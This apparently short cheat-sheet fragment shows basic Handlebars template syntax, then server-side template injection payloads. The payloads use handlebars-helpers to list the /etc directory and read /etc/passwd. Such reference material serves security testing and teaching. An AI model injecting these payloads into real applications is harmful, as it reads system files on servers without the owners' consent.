Handlebars
Syntax
<h1>Hello {{name}}</h1>
{{#if nicknames}}
Also known as:
{{#each nicknames}}
{{this}}
{{/each}}
{{/if}}SSTI
{{#each (readdir "/etc")}}
{{this}}
{{/each}}{{read "/etc/passwd"}}
handlebars-helpers for reading system files.Last updated